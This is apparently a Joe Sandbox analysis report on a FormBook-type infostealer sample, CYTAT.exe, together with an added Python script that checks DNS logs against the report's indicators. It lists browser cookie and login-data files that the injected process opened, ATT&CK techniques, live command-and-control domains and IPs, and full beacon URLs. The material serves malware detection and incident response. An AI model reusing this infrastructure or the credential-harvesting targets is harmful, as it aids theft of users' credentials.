Source: Yara match | File source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: CYTAT.exe | Binary or memory string: WIN_XP
Source: CYTAT.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: CYTAT.exe | Binary or memory string: WIN_XPe
Source: CYTAT.exe | Binary or memory string: WIN_VISTA
Source: CYTAT.exe | Binary or memory string: WIN_7
Source: CYTAT.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
MITRE ATT&CK Matrix

Each tactic column is listed with its matrix cells; the number in parentheses is the count the report shows on that cell for this sample, and cells without a number are unflagged matrix entries.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (141); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1518075, Sample: CYTAT.exe, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100)

Root node, DNS/IP info: www.woshop.online; www.tekilla.wtf; 15 other IPs or domains
Root node, signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures

Process tree:
• CYTAT.exe (1), started. Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  • svchost.exe, started. Signatures: Maps a DLL or memory area into another process
    • eMNaOgRkIZi.exe, injected. Signatures: Found direct / indirect Syscall (likely to bypass EDR)
      • netbtugc.exe (13), started. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        • eMNaOgRkIZi.exe, injected. DNS/IP info: www.kexweb.top 63.250.47.40 (ports 52120, 52121, 52122; NAMECHEAP-NETUS; United States); bola88site.one 172.96.191.39 (ports 52112, 52113, 52114; LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG; Canada); 7 other IPs or domains. Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        • firefox.exe, started

Antivirus detection (Source | Detection | Scanner | Label):
CYTAT.exe | 26% | ReversingLabs
CYTAT.exe | 100% | Avira | HEUR/AGEN.1321671
CYTAT.exe | 100% | Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.languagemodel.pro/nxfn/0%Avira URL Cloudsafe
            http://www.kexweb.top/3bdq/0%Avira URL Cloudsafe
            http://www.dyme.tech/h7lb/0%Avira URL Cloudsafe
            http://www.mizuquan.top0%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy390%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU100%Avira URL Cloudmalware
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQuk100%Avira URL Cloudmalware
            http://www.kexweb.top/3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnb0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/100%Avira URL Cloudmalware
            https://whois.gandi.net/en/results?search=languagemodel.pro0%Avira URL Cloudsafe
            http://www.dyme.tech/h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/100%Avira URL Cloudmalware
            http://www.omexai.info/7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb100%Avira URL Cloudmalware
            http://www.bola88site.one/3qit/100%Avira URL Cloudmalware
            http://www.mizuquan.top/e0nr/0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x0%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            148.72.152.174
            truetrue
              unknown
              webredir.vip.gandi.net
              217.70.184.50
              truetrue
                unknown
                www.kexweb.top
                63.250.47.40
                truetrue
                  unknown
                  bola88site.one
                  172.96.191.39
                  truetrue
                    unknown
                    www.dyme.tech
                    13.248.169.48
                    truetrue
                      unknown
                      www.mizuquan.top
                      43.242.202.169
                      truetrue
                        unknown
                        redirect.3dns.box
                        172.191.244.62
                        truetrue
                          unknown
                          jobworklanka.online
                          91.184.0.200
                          truetrue
                            unknown
                            omexai.info
                            3.33.130.190
                            truetrue
                              unknown
                              www.bola88site.one
                              unknown
                              unknowntrue
                                unknown
                                www.tekilla.wtf
                                unknown
                                unknowntrue
                                  unknown
                                  www.omexai.info
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.jobworklanka.online
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.arlon-commerce.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.woshop.online
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.kxshopmr.store
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.languagemodel.pro
                                            unknown
                                            unknowntrue
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.dyme.tech/h7lb/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.kexweb.top/3bdq/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tekilla.wtf/fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIUtrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.languagemodel.pro/nxfn/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.kexweb.top/3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnbtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.jobworklanka.online/ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy39true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tekilla.wtf/fpzw/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.omexai.info/7xi5/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.dyme.tech/h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnbtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mizuquan.top/e0nr/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.bola88site.one/3qit/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.jobworklanka.online/ikh0/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.languagemodel.pro/nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8xtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.omexai.info/7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnbtrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabnetbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://duckduckgo.com/ac/?q=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.mizuquan.topeMNaOgRkIZi.exe, 0000000D.00000002.3108584248.0000000004DE1000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQuknetbtugc.exe, 0000000C.00000002.3107256962.0000000003F18000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003038000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.0000000025CF8000.00000004.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.gandi.net/en/domain | netbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whois.gandi.net/en/results?search=languagemodel.pro | netbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.191.244.62 | redirect.3dns.box | United States | 7018 | ATT-INTERNET4US | true
63.250.47.40 | www.kexweb.top | United States | 22612 | NAMECHEAP-NETUS | true
13.248.169.48 | www.dyme.tech | United States | 16509 | AMAZON-02US | true
91.184.0.200 | jobworklanka.online | Netherlands | 197902 | HOSTNETNL | true
172.96.191.39 | bola88site.one | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
148.72.152.174 | www.elsupertodo.net | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
3.33.130.190 | omexai.info | United States | 8987 | AMAZONEXPANSIONGB | true
43.242.202.169 | www.mizuquan.top | Hong Kong | 40065 | CNSERVERSUS | true
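The hosts and addresses in the table above are the indicators a responder actually takes away from this report. The script below is an added example for this page, not Joe Sandbox code: it transcribes the table into a small indicator set and runs it over DNS query logs. The log lines and their format (timestamp, host=, query=, type=, answer=) are constructed here for illustration. Matching is exact-host or subdomain-of on purpose; webredir.vip.gandi.net and the Amazon addresses are shared infrastructure, so widening a match to the registrable domain (gandi.net) or to a whole ASN would generate noise rather than detections.

```python
"""Check DNS query logs against the network indicators in this report.

Added example for this page; it is not Joe Sandbox code. The indicator rows
are transcribed from the report's IP/Domain/ASN table; the log lines and the
log format (ts host=... query=... type=... answer=...) are constructed here.
"""
import ipaddress
import re

# (ip, domain, asn, asn_name) as listed by the sandbox for this sample.
REPORT_IOCS = [
    ("172.191.244.62", "redirect.3dns.box", 7018, "ATT-INTERNET4US"),
    ("63.250.47.40", "www.kexweb.top", 22612, "NAMECHEAP-NETUS"),
    ("13.248.169.48", "www.dyme.tech", 16509, "AMAZON-02US"),
    ("91.184.0.200", "jobworklanka.online", 197902, "HOSTNETNL"),
    ("172.96.191.39", "bola88site.one", 59253, "LEASEWEB-APAC-SIN-11"),
    ("217.70.184.50", "webredir.vip.gandi.net", 29169, "GANDI-AS"),
    ("148.72.152.174", "www.elsupertodo.net", 30083, "AS-30083-GO-DADDY-COM-LLC"),
    ("3.33.130.190", "omexai.info", 8987, "AMAZONEXPANSIONGB"),
    ("43.242.202.169", "www.mizuquan.top", 40065, "CNSERVERSUS"),
]
IOC_DOMAINS = {d.lower() for _, d, _, _ in REPORT_IOCS}
IOC_IPS = {ipaddress.ip_address(ip) for ip, _, _, _ in REPORT_IOCS}

# Constructed log format for this example (not a real product's format).
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+query=(?P<query>\S+)\s+type=\S+"
    r"(?:\s+answer=(?P<answer>\S+))?\s*$"
)

def normalise(name: str) -> str:
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return name.lower().rstrip(".")

def domain_hit(query: str):
    """Exact host or a subdomain of a listed host. Deliberately no apex
    matching: webredir.vip.gandi.net is shared hosting, so 'gandi.net'
    must not become an indicator by accident."""
    q = normalise(query)
    for ioc in sorted(IOC_DOMAINS):
        if q == ioc or q.endswith("." + ioc):
            return ioc
    return None

def ip_hit(answer):
    """Resolved address equal to a listed C2 address, None otherwise."""
    if not answer:
        return None
    try:
        addr = ipaddress.ip_address(answer)
    except ValueError:
        return None
    return str(addr) if addr in IOC_IPS else None

def scan(lines):
    """Return one hit record per log line that touches an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped, not treated as hits
        d = domain_hit(m["query"])
        i = ip_hit(m["answer"])
        if d or i:
            hits.append({"ts": m["ts"], "host": m["host"],
                         "query": normalise(m["query"]),
                         "domain_ioc": d, "ip_ioc": i})
    return hits

def hosts_per_indicator(hits):
    """Group affected endpoints by indicator, which is what triage needs."""
    out = {}
    for h in hits:
        for key in (h["domain_ioc"], h["ip_ioc"]):
            if key:
                out.setdefault(key, set()).add(h["host"])
    return {k: sorted(v) for k, v in sorted(out.items())}

# Constructed sample log: two exact-host hits, one subdomain hit, one
# apex-only miss (kexweb.top without www), one IP-only hit, one clean
# line and one unparseable line.
SAMPLE_LOG = """\
2024-09-25T09:36:02Z host=WS-042 query=www.kexweb.top. type=A answer=63.250.47.40
2024-09-25T09:36:03Z host=WS-042 query=update.microsoft.com type=A answer=20.10.1.5
2024-09-25T09:36:05Z host=WS-017 query=JOBWORKLANKA.ONLINE type=A answer=91.184.0.200
2024-09-25T09:36:06Z host=WS-017 query=cdn.omexai.info type=A answer=203.0.113.9
2024-09-25T09:36:07Z host=WS-099 query=kexweb.top type=A answer=198.51.100.4
2024-09-25T09:36:08Z host=WS-023 query=something.example type=A answer=217.70.184.50
garbage line that does not parse
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(hosts_per_indicator(scan(SAMPLE_LOG)))
```

The IP-only hit on 217.70.184.50 is the case to treat with care: that address is Gandi's shared web redirector, so a hit there needs the query name before it becomes an incident.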
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1518075
                                              Start date and time:2024-09-25 11:35:14 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 34s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
Number of new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:CYTAT.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@12/9
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 53
                                              • Number of non-executed functions: 301
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 92.204.80.11
                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, time.windows.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target eMNaOgRkIZi.exe, PID 2432 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • VT rate limit hit for: CYTAT.exe
Time | Type | Description
06:56:29 | API Interceptor | 6453983x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.191.244.62 | Cotizaci#U00f3n.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | PO# Q919240.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | PAGO $830.900.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | EGCS-875-S5-SMO M2A.exe | malicious | FormBook | www.lurknlarkk.xyz/cjjz/
172.191.244.62 | PO #86637.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | AUG 2024 SOA.exe | malicious | FormBook | www.hermesmilano.xyz/f3mz/
172.191.244.62 | DN.exe | malicious | FormBook | www.hermesmilano.xyz/f3mz/
172.191.244.62 | COTIZACION 290824.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe | malicious | FormBook | www.hermesmilano.xyz/lmxx/
172.191.244.62 | COTIZACION 280824.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
